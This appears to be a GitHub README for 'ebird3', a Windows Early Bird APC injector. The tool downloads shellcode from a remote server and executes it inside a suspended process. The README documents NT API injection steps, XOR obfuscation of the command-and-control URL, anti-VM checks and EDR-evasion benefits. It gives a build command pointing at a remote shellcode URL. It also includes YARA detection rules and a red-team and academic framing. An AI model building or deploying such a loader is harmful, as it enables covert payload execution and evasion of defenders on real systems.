- GitHub Repository: https://github.com/grisuno/ebird3
- License: GNU General Public License v3.0 (GPLv3)
- Author: grisuno
- Target Platform: Windows (x64)
- Purpose: Academic research and red teaming exercises
β οΈ This project is released under GPLv3. See the DISCLAIMER section for full legal terms.
ebird3 is a sophisticated Early Bird APC injection tool designed to download and execute shellcode in a suspended legitimate Windows process using undocumented NT API calls (NtAllocateVirtualMemory, NtWriteVirtualMemory, NtQueueApcThread) and asynchronous procedure calls (APC). It leverages string obfuscation, anti-analysis techniques, and manual WinSock HTTP downloading to evade basic detection mechanisms.
This tool is intended exclusively for academic and ethical penetration testing purposes.
| Feature | Description |
|---|---|
| Early Bird APC Injection | Injects shellcode into a newly created, suspended process before it starts executing, bypassing user-mode hooks. |
| NT Native API Usage | Uses Nt* functions from ntdll.dll instead of common Win32 APIs to evade EDR userland hooks. |
| String Obfuscation | All sensitive strings (URL, process path, User-Agent) are XOR-encoded with a user-defined key. |
| Dynamic Shellcode Download | Fetches shellcode via raw HTTP(S) request from a remote server. Shellcode must be in \xNN format. |
| Anti-Analysis | Detects VM environments (VMware, VirtualBox, QEMU, Xen) via registry checks and exits if detected. |
| Manual HTTP Client | Implements a minimal HTTP 1.1 client using WinSock to avoid WinINet/WinHTTP detection. |
| Stackless Compilation | Compiled with -fno-stack-protector and optimized for size (-Os) to reduce footprint. |
The gen_ebird3.sh script generates:
ebird2.c: The main implant source code with embedded obfuscated configuration.Makefile: Cross-compilation rules using MinGW-w64.
sudo apt install mingw-w64./gen_ebird3.sh \
--target windows \
--url "http://192.168.1.100/shellcode.txt" \
--process-name "C:/Windows/System32/calc.exe" \
--key 0x33β Output: ebird2.exe β a fully self-contained Windows executable.
- String Obfuscation All strings are XOR-encoded at compile time using a user-provided key (default: 0x33):
unsigned char OBF_SHELLCODE_URL[] = { 0x12, 0x34, ... };Decoded at runtime via:
void xor_string(char* data, size_t len, char key) {
for (int i = 0; i < len; i++) data[i] ^= key;
}- Shellcode Download & Extraction
- Parses HTTP response body.
- Extracts shellcode in \xNN\xNN... format.
- Applies XOR decryption using the same key.
- Enforces size limit: 2 MB by default.
- Process Injection Flow
1. Create target process (e.g., calc.exe) in SUSPENDED state
2. Resolve NtAllocateVirtualMemory β Allocate RWX memory
3. Resolve NtWriteVirtualMemory β Write shellcode
4. Resolve NtQueueApcThread β Queue APC to remote thread
5. Resume thread β APC executes shellcode- Anti-Analysis Checks Checks BIOS version string in registry:
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
Exits if any of the following substrings are found:
- VMWARE
- VBOX
- QEMU
- XEN
Basic IOC: Obfuscated Strings + NT API Imports
rule ebird3_EarlyBird_APC {
meta:
author = "LazyOwn BlueTeam Analyst"
description = "Detects ebird3 Early Bird APC injector"
reference = "https://github.com/grisuno/ebird3"
license = "GPLv3"
strings:
$xord_url = { 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? e8 ?? ?? ?? ?? 83 c4 08 } // XOR loop pattern
$ntdll_imports = "ntdll.dll" ascii wide
$nt_funcs[4] = (
"NtAllocateVirtualMemory"
"NtWriteVirtualMemory"
"NtQueueApcThread"
"NtClose"
)
$create_suspended = { 6A 04 6A 00 6A 00 6A 00 6A 00 6A 00 } // CREATE_SUSPENDED flag
$http_get = "GET /" ascii wide
$user_agent = "Mozilla/5.0 (Windows NT 10.0;" ascii wide
condition:
all of ($nt_funcs) and $ntdll_imports and $create_suspended and
($http_get or $user_agent) and $xord_url
}Heuristic: Suspicious Memory Allocation + APC
rule ebird3_NtQueueApcThread_Heuristic {
meta:
author = "LazyOwn BlueTeam"
description = "Detects use of NtQueueApcThread for shellcode execution"
strings:
$apc_call = /call.*GetProcAddress.*NtQueueApcThread/
$alloc_exec = "MEM_COMMIT | MEM_RESERVE" fullword
$page_exec_rw = "PAGE_EXECUTE_READWRITE" fullword
condition:
$apc_call and $alloc_exec and $page_exec_rw
}- NT API Calls
- Bypasses userland API hooks from EDRs
- No WinINet/WinHTTP
- Avoids common HTTP beaconing detection
- XOR Obfuscation
- Hides C2 URL and process name
- Anti-VM
- Prevents analysis in sandboxed environments
- Small Binary Size
- Harder to analyze statically
- APC Injection
- Executes before main thread starts (early bird)
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
This project is intended to:
Help security researchers understand APC injection and NT API abuse. Assist blue teams in developing better detection rules. Promote awareness of living-off-the-land techniques.
- https://github.com/grisuno/LazyOwn
- https://grisuno.github.io/LazyOwn/
- https://www.reddit.com/r/LazyOwn/
- https://github.com/grisuno/LazyOwnBT
- https://web.facebook.com/profile.php?id=61560596232150
- https://app.hackthebox.com/teams/overview/6429
- https://app.hackthebox.com/users/1998024
- https://patreon.com/LazyOwn
- https://deepwiki.com/grisuno/ebird3
- https://github.com/grisuno/cgoblin
- https://github.com/grisuno/gomulti_loader
- https://github.com/grisuno/ShadowLink
- https://github.com/grisuno/OverRide
- https://github.com/grisuno/amsi
- https://medium.com/@lazyown.redteam
- https://discord.gg/V3usU8yH
- https://ko-fi.com/Y8Y2Z73AV
- https://medium.com/@lazyown.redteam/the-ebird3-chronicles-when-your-calculator-gets-a-phd-in-cybercrime-and-why-thats-perfectly-cc1738a3affc
- https://github.com/grisuno/LazyOwn/archive/refs/tags/release/0.2.58.tar.gz
